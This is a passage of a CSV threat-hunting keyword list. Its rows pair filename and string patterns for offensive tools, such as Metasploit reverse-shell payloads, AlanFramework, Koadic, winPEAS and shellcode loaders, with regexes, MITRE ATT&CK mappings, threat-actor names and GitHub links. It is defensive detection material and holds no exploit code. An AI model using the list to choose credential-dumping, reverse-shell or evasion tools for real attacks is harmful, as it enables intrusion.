tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - 
TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows/x64/shell_reverse_tcp*",".{0,1000}windows\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows\samdump.go*",".{0,1000}windows\\samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
"*windows_agent/asm/x64/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x64\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/asm/x86/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x86\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/dll_main.*",".{0,1000}windows_agent\/dll_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/exe_main.*",".{0,1000}windows_agent\/exe_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/win_*.c*",".{0,1000}windows_agent\/win_.{0,1000}\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation 
framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/win_named_pipe.*",".{0,1000}windows_agent\/win_named_pipe\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/win_shell.*",".{0,1000}windows_agent\/win_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_autologin.md*",".{0,1000}windows_autologin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows_console_interceptor*dll_main.c*",".{0,1000}windows_console_interceptor.{0,1000}dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_console_interceptor*exe_main.c*",".{0,1000}windows_console_interceptor.{0,1000}exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_console_interceptor*interceptor.*",".{0,1000}windows_console_interceptor.{0,1000}interceptor\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" 
"*windows_credentials.py*",".{0,1000}windows_credentials\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*windows_key.py*",".{0,1000}windows_key\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*windows_recon.bat*",".{0,1000}windows_recon\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*windows_sam_hivenightmare.md*",".{0,1000}windows_sam_hivenightmare\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows_sam_hivenightmare.rb*",".{0,1000}windows_sam_hivenightmare\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Windows_Trojan_Metasploit*",".{0,1000}Windows_Trojan_Metasploit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows10_ntfs_crash_dos*",".{0,1000}windows10_ntfs_crash_dos.{0,1000}","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","6","591","131","2020-04-28T18:11:52Z","2018-04-27T19:31:59Z" "*Windows7-BypassLogon-Screen.ino*",".{0,1000}Windows7\-BypassLogon\-Screen\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*WindowsEnum -*",".{0,1000}WindowsEnum\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*WindowsExploits*",".{0,1000}WindowsExploits.{0,1000}","offensive_tool_keyword","Exploits","A curated archive of complied and 
tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1240","537","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z" "*windows-exploit-suggester.*",".{0,1000}windows\-exploit\-suggester\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*windows-forkbomb.ino*",".{0,1000}windows\-forkbomb\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*WindowsLies*BlockWindows*",".{0,1000}WindowsLies.{0,1000}BlockWindows.{0,1000}","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","7","641","109","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z" "*Windows-Post-Exploitation*",".{0,1000}Windows\-Post\-Exploitation.{0,1000}","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","6","507","117","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z" "*windows-privesc-check*",".{0,1000}windows\-privesc\-check.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Windows-Privilege-Escalation*",".{0,1000}Windows\-Privilege\-Escalation.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*WindowsShareFinder.cs*",".{0,1000}WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*window-state@safejka.eu*",".{0,1000}window\-state\@safejka\.eu.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*winexec.notepad.raw*",".{0,1000}winexec\.notepad\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*WinhttpShellcode.cpp*",".{0,1000}WinhttpShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*WinhttpShellcode.exe*",".{0,1000}WinhttpShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode 
Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*WinhttpShellcode.sln*",".{0,1000}WinhttpShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*WinhttpShellcode.vcxproj*",".{0,1000}WinhttpShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*Win-Ops-Master.*",".{0,1000}Win\-Ops\-Master\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Winpayloads*",".{0,1000}Winpayloads.{0,1000}","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","10","1544","336","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*WinPEAS.exe*",".{0,1000}WinPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEAS.exe*",".{0,1000}winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*winPEAS.Info.FilesInfo.Office.Office*",".{0,1000}winPEAS\.Info\.FilesInfo\.Office\.Office.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*winPEAS.ps1*",".{0,1000}winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEAS.txt*",".{0,1000}winPEAS\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEAS-Obfuscated*",".{0,1000}winPEAS\-Obfuscated.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" 